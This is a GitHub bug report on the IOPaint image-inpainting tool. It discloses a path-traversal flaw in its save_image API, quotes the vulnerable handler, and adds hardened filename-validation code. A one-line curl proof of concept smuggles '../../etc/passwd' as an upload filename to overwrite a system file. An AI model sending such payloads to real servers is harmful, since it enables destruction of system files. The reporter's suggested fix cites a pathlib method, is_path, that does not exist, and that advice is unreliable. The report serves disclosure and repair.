Sanster / IOPaint

Image inpainting tool powered by SOTA AI Model. Remove any unwanted object, defect, people from your pictures or erase and replace(powered by stable diffusion) any thing on your pictures.
https://www.iopaint.com/
Apache License 2.0
19.24k stars 1.97k forks

[BUG] Critical CVE File Overwrite #585

Open caeroltheplasmoid opened 3 hours ago

caeroltheplasmoid commented 3 hours ago

Model
Which model are you using?

Describe the bug
A clear and concise description of what the bug is.
CVE type: File Overwrite
URL: http://localhost:8080/api/v1/save_image

Poc: curl -X POST "http://localhost:8080/api/v1/save_image" -F "file=@file.mp4;filename=../../etc/passwd;"

Error is going here:

def api_save_image(self, file: UploadFile):
    # filename is taken verbatim from the multipart request, so the client controls it
    filename = file.filename

    origin_image_bytes = file.file.read()
    # output_dir / "../../etc/passwd" resolves outside output_dir; nothing stops it
    with open(self.config.output_dir / filename, "wb") as fw:
        fw.write(origin_image_bytes)

No check for filename, therefore it's user-controlled. Basically, we can't name our files like "../../something", but it's not the case when we're using curl.

caeroltheplasmoid commented 3 hours ago

Solution: it can be easily fixed with Pathlib's checking is_path. pathlib.Path(filename).is_path() Gonna create PR
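A hardened version of the write in api_save_image, added here as an example (this is not IOPaint's code nor the reporter's PR); it assumes output_dir is a filesystem directory and that a legitimate upload name is a single path component with no separators.

```python
from pathlib import Path
from typing import Union


def safe_output_path(output_dir: Union[str, Path], filename: str) -> Path:
    """Map a client-supplied filename to a path strictly inside output_dir.

    Raises ValueError for anything that is not a single plain path component
    or that would resolve outside output_dir (symlinks included).
    """
    root = Path(output_dir).resolve()
    # A legitimate upload name is one component: for "../../etc/passwd",
    # Path(...).name is "passwd", which differs from the raw value, so it is rejected.
    if (not filename or filename in (".", "..") or "\\" in filename
            or "\x00" in filename or Path(filename).name != filename):
        raise ValueError(f"rejected upload filename: {filename!r}")
    target = (root / filename).resolve()
    # Defence in depth: even after the name check, the resolved target
    # (symlinks followed) must still be under the output directory.
    try:
        target.relative_to(root)
    except ValueError:
        raise ValueError(f"path escapes output directory: {filename!r}") from None
    return target


def is_safe_filename(output_dir: Union[str, Path], filename: str) -> bool:
    """Boolean wrapper around safe_output_path, handy for tests and logging."""
    try:
        safe_output_path(output_dir, filename)
        return True
    except ValueError:
        return False


def save_upload(output_dir: Union[str, Path], filename: str, data: bytes) -> Path:
    """Hardened equivalent of the file write in api_save_image."""
    target = safe_output_path(output_dir, filename)
    target.write_bytes(data)
    return target


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed sample inputs: a benign name and the traversal name from the issue.
        print(save_upload(tmp, "result.png", b"\x89PNG constructed sample"))
        for bad in ("../../etc/passwd", "/etc/passwd", "..", "sub/x.png"):
            print(bad, "->", is_safe_filename(tmp, bad))
```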